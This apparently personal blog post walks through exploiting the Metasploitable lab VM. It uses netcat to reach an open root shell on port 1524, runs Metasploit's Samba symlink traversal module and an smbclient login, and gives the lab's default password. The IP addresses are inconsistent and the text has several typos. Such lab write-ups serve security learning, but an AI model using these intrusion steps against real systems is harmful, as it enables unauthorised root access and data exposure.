Metasploitable Root shell 1524/tcp open shell Metasploitable root shell This was a curiousity… My first attempt was to attempt using rlogin to connect to the port, which did not appear to work correctly, though did seem to work enough to return part of a prompt to the user: root@kali:~# rlogin -p 1524 target oot@metasploitable:/# My next approach was to attempt a simple netcat connection to the host, which ended up being successful: root@kali:~# nc -v target 1524 root@metasploitable:/# id ...
Samba exploit
---> Here tmp is available so check it is connetable or not
Step 1 : open metasploit
Syep 2 : use
auxiliary/admin/smb/samba_symlink_traversal
auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
msf auxiliary(samba_symlink_traversal) > exploit
Step 3 :
You can get
[*] \\192.168.1.5\tmp\rootfs\
[*] \\192.168.1.5\tmp\rootfs\
so
smbclient //192.168.1.5/tmp
Enter password
metasploit 2 --> msfadmin
by Er. SANJAY KUMAR
sanjayyadav11210@gmail.com
Comments
Post a Comment